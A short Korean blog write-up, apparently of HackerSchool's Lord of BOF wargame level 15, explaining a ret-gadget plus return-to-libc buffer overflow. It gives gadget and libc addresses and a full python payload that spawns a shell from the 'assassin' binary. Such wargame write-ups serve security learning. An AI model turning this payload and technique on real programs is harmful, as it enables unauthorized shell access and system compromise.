HackerSchool LOB Level15 소스를 본다 보니까스택이랑 공유라이브러리 주소를 사용하지 못한다. 제길 도저히 모르겠어서 검색했다.코드 마지막에 있는 ret을 리턴주소에다가 넣어서 pop eip를 한번 하면 스택이 4바이트 만큼 올라가서 다음 4바이트로 리턴을 사용할 수 있다고 한다. 그럼 페이로드는NOP*44 + &ret + &system + NOP*$ + &/bin/sh ret : 0x804851e system : 0x40058ae0 exit : 0x400391e0 &/bin/sh : 0x400fbff9 ./assassin `python -c 'print "\x90"*44+"\x1e\x85\x04\x08"+"\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"'` 더보기 이전 1 ··· 22 23 24 25 26 27 28 ··· 95 다음